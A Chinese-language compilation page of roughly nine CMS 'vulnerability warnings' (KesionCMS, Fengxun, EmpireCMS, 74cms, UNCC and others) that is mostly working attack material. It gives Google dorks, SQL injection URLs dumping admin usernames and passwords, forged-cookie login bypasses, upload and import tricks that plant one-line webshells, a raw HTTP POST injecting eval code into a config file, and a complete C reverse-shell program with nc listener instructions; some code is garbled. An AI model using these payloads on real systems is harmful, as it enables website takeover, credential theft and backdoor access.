下面是小编为大家整理的蓝方互联(科讯CMS精简版) 取shell漏洞漏洞预警(共含9篇),欢迎阅读与收藏。同时,但愿您也能像本文投稿人“hhhhhush”一样,积极向本站投稿分享好文章。
蓝方互联建站程序是基于《科讯CMS V7.0》的定制程序,官方售价160RMB
虽然是基于《科讯CMS V7.0》但是不能用科讯7.0的后台拿shell方法,管理帐号密码可以用科讯的方法来获取,蓝方互联精简后不能添加自定义页面等,但可以导出标签,并能自定义导出的名称,没有过滤后缀,亮点就是随便添加个标签,html代码里写入了一句话,导出tnt.asp ,抄菜刀,连接,搞定!
关键字:Powered By KesionCMS V5.5 inurl:User/UserReg.asp
步骤一: 访问/user/userreg.asp 注册用户
步骤二: 访问/KS_editor/selectupfiles.asp ,勾选自动命名选项,上传命名如X.asp;X.jpg文件,
步骤三: 访问上传文件 路径 xm.asp;xm.jpg
/Upfiles/User/用户名/xm.asp;xm.jpg
关键字: inurl:User/Reg_service.asp
风讯的注册页面...
漏洞页面:/user/SetNextOptions.asp
利用方法:
构造注入
user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
“admin_name”管理用户名数据库表
user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin
“admin_pass_word”管理密码数据库表
把下面的代码保存成一个ASP文件然后在本地架一个ASP环境就OK了
DE>
要暴的ID号(默认是1)<%=id%>”>ID为1的是超级管理员
第”&id&“位的管理员
”response.write “
网站后台地址
”for i=126 to len(str)mid1=mid1&mid(str,i,1)nextresponse.write “
------------------
帐号:”&mid1&“
”x.open “get”,webpass,false x.send str=bin2str(x.responseBody)for i=126 to len(str)mid2=mid2&mid(str,i,1)next response.write “
密码:”&mid2&“
------------------
” response.write “
爆出咯,可以YY了
cmd5” set x=nothingend if%>DE>
具体的利用方法请参考源码,
风讯CMS 0DAY exploits漏洞预警
,
帝国CMS7.0后台可上传mod后缀的PHP文件并执行里面的php代码,
进入后台~!
方法一:系统——数据表与系统模型——管理数据表 再随意选择一个数据表,打开对应数据表的“管理系统模型”如图:
“导入系统模型”,可进入“LoadInM.php”页面,如图:
在本地新建一个文件,文本内容为
再命名为1.php.mod,导入这个mod文件,即执行里面的php代码,在ecmsmod.php的相同目录下生产x.php的一句话木马文件,
可以从导入系统模型源文件中查看到,如图:
方法二:
在本地新建一个info.php(任意php文件)其源码内容为
再重名名为info.php.mod,将此文件按照方法一导入系统模型
即可执行info.php.mod的代码并显示在页面上,迅速查看源码即可得知网站根目录的绝对路径,如图:
info.php.mod的源码
然后
系统——备份与恢复数据——执行SQL语句在执行SQL语句框中输入如下代码:
即可在网站根目录生成 z.php 菜刀连接即可~!
0x1 任意用户登录
0x2 盲注
0x3 后台拿shell
0x4 随机函数问题
详细说明:
0x1 任意用户登录
user/login.php
elseif((empty($_SESSION['uid']) || empty($_SESSION['username']) || empty($_SESSION['utype'])) && $_COOKIE['QS']['username'] && $_COOKIE['QS']['password'] && $_COOKIE['QS']['uid'])
{
if(check_cookie($_COOKIE['QS']['username'],$_COOKIE['QS']['password']))
{
update_user_info($_COOKIE['QS']['uid'],false,false);
header(“Location:”.get_member_url($_SESSION['utype']));
}
else
{
unset($_SESSION['uid'],$_SESSION['username'],$_SESSION['utype'],$_SESSION['uqqid'],$_SESSION['activate_username'],$_SESSION['activate_email'],$_SESSION[“openid”]);
setcookie(“QS[uid]”,“”,time - 3600,$QS_cookiepath, $QS_cookiedomain);
setcookie('QS[username]',“”, time() - 3600,$QS_cookiepath, $QS_cookiedomain);
setcookie('QS[password]',“”, time() - 3600,$QS_cookiepath, $QS_cookiedomain);
setcookie(“QS[utype]”,“”,time() - 3600,$QS_cookiepath, $QS_cookiedomain);
header(“Location:”.url_rewrite('QS_login'));
}
}
include/fun_user.php
//检测COOKIE
function check_cookie($name,$pwd){
global $db;
$row = $db->getone(“SELECT COUNT(*) AS num FROM ”.table('members').“ WHERE username='{$name}' and password = '{$pwd}'”);
if($row['num'] > 0)
{
return true;
}else{
return false;
}
}
构造cookie如下
QS[uid] 2
QS[utype] 1
QS[password] 111111111111111111111
QS[username]%bf%27 or 1=1 %23
uid 为假冒用户的ID utype为用户类型password任意
0x2 盲注
demo32.74cms.com//resume/resume-list.php?key=test00%bf')/**/and+if((select/**/admin_name/**/from/**/qs_admin/**/limit/**/0,1)=0x61646D696E,benchmark(1000000000,(select/**/1)),1)/**/%23
上面两个都是宽字节注入,如果你能猜出管理员密码,还能解出双重md5的话,还能猜出后台路径,继续看下面
0x3 后台拿shell
1.先关闭csrf防御功能
2.在hr工具箱中添加一个伪造的doc,内容为
3.在工具-计划任务中添加任务,脚本任务填../../data/hrtools//06/1339941553308.doc
4.然后执行
0x4 随机函数问题(几乎可以无视,纯属个人YY)
在admin_common.fun.inc.php中有个$QS_pwdhash是在安装的时候赋值的,只要能猜出就可已不用解双重md5了,
骑士cms注入及后台拿shell漏洞预警
,
这个$QS_pwdhash是由randstr生成
function randstr($length=6)
{
$hash='';
$chars= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz@#!~?:-=';
$max=strlen($chars)-1;
mt_srand((double)microtime()*1000000);
for($i=0;$i<$length;$i++) {
$hash.=$chars[mt_rand(0,$max)];
}
return $hash;
}
生成长度为6的随机数,mt_srand()播种一样,就会得到一样的随机数,所以我们最多要猜1000000次就可以了( )
漏洞证明:
修复方案:
do it yourself~
作者yy520
简要描述:
UNCC动力互联建站存在多种高危漏洞,基本通杀所有程序,
(这次报个礼包求邀请码)
详细说明:
后台入口:
/manage/login.aspx
伪造cookie即可绕过登陆
[{ “domain”: “.xxx.com”, “expirationDate”: 1392975480, “hostOnly”: false, “httpOnly”: false, “name”: “AdminID”, “path”: “/”, “secure”: false, “session”: false, “storeId”: “0”, “value”: “1”},{ “domain”: “.xxx.com”, “expirationDate”: 1392975480, “hostOnly”: false, “httpOnly”: false, “name”: “AdminName”, “path”: “/”, “secure”: false, “session”: false, “storeId”: “0”, “value”: “admin”}]
爆管理员账户密码:
/manage/admins.aspx
任意文件下载/删除:
期刊下载-添加下载文档 (删除此条目会同时删掉所指向文件)
SQL注入:
/manage/EditAdmin.aspx?ID=1'
/manage/EditAdmin.aspx?ID=1 and 1=1
漏洞证明:
修复方案:
过滤,验证
漏洞类型:代码执行
关键字:inurl:index.php?m=shopcar
问题出在/install/index.php文件,在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。
可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。
1、getshell(很危险)
if(empty($_REQUEST['step']) || $_REQUEST['step']==1){$smarty->assign(“step”,1);$smarty->display(“index.html”);}elseif($_REQUEST['step']==2){$mysql_host=trim($_POST['mysql_host']);$mysql_user=trim($_POST['mysql_user']);$mysql_pwd=trim($_POST['mysql_pwd']);$mysql_db=trim($_POST['mysql_db']);$tblpre=trim($_POST['tblpre']);$domain==trim($_POST['domain']);$str=“';file_put_contents(“../config/config.inc.php”,$str);//将提交的数据写入php文件
上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马
-----------post----------
POST /canting/install/index.php?m=index&step=2 HTTP/1.1
Host: 192.168.80.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: 192.168.80.129/canting/install/index.php?step=1
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
Content-Type: application/x-www-form-urlencoded
Content-Length: 126
mysql_host=test“);@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD
---------post----------
但是这个方法很危险,将导致网站无法运行,
2、直接添加管理员
elseif($_REQUEST['step']==5){if($_POST){ require_once(”../config/config.inc.php“);$link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);mysql_select_db(MYSQL_DB,$link);mysql_query(”SET NAMES “.MYSQL_CHARSET );mysql_query(”SET sql_mode=''“);$adminname=trim($_POST['adminname']);$pwd1=trim($_POST['pwd1']);$pwd2=trim($_POST['pwd2']);if(empty($adminname)){echo ”“;exit;}if(($pwd1!=$pwd2) or empty($pwd1)){echo ”“;//这里也是没有退出}mysql_query(”insert into “.TABLE_PRE.”admin(adminname,password,isfounder) values('$adminname','“.umd5($pwd1).”',1)“);//直接可以插入一个管理员}
这样的话我们就可以直接插入一个管理员帐号,语句如下:
POST /canting/install/index.php?m=index&step=5 HTTP/1.1Host: 192.168.80.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: 192.168.80.129/canting/install/index.php?step=1
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
adminname=qingshen&pwd1=qingshen&pwd2=qingshen
#include
#include
#include
#include
#include
#include
#include
void usage();
char shell[]=”/bin/sh“;
char message[]=”s8s8 welcomen“;
int sock;
int main(int argc, char *argv[]) {
if(argc <3){
usage(argv[0]);
}
struct sockaddr_in server;
if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf(”Couldn't make socket!n“); exit(-1);
}
server.sin_family = AF_INET;
server.sin_port = htons(atoi(argv[2]));
server.sin_addr.s_addr = inet_addr(argv[1]);
if(connect(sock, (struct sockaddr *)&server, sizeof(struct sockaddr)) == -1) {
printf(”Could not connect to remote shell!n“);
exit(-1);
}
send(sock, message, sizeof(message), 0);
dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);
execl(shell,”/bin/sh“,(char *)0);
close(sock);
return 1;
}
void usage(char *prog[]) {
printf(”tts8s8 connect back doornn“);
printf(”t sql@s8s8.netnn“);
printf(”Usage: %s n", prog);
exit(-1);
}
gcc -o f f.c
再在本机上监听一个端口
nc -l -p 8888
再执行./f 192.168.1.14 8888
注:反弹回来的 shell没提示符,
linux 反弹shell漏洞预警
,
原创:sobiny[bct]
组织:Bug.Center.Team
首发:sobiny.cn
科讯CMS这个程序里面,Execute函数出现了大概三个地方耶。。
不过其中有一个地方过滤不严,
其Execute函数内的参数可以任意构造。导致执行漏洞。。
凭回忆描述一下:
是HTTP头的IP地址的问题,入库了后。
然后取出来后,就直接放到Execute函数里面了。
这个漏洞可比一般的注入和上传要来得严重得多,啊哈哈。。
我实在没时间去写详细利用过程。
呼叫whytt写EXP。。
★ Artiphp CMS 5.5.0数据库备份泄露Exploit漏洞预警
★ dedecms 5.7 edit.inc.php文件注射漏洞预警
★ shopxp pinglun.asp文件SQL注入漏洞分析漏洞预警
